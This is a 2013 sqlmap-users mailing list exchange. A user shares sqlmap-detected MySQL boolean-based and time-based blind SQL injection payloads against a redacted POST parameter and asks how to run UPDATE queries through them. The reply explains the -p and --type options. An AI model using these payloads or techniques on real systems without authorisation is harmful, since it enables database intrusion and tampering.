On Monday, February 18, 2013, Bruno Garcia wrote:
> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there any way I could test the queries with
> the second injection?
>
Hello,
I am not at a computer now, so this is out of my head.
If you want to test a specific parameter, use -p parameter_name; if you
want to use a specific injection type that was detected, use --type=E as an
example for error based injection.
--
Regards
L.
Sent using electronic mail ツ
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users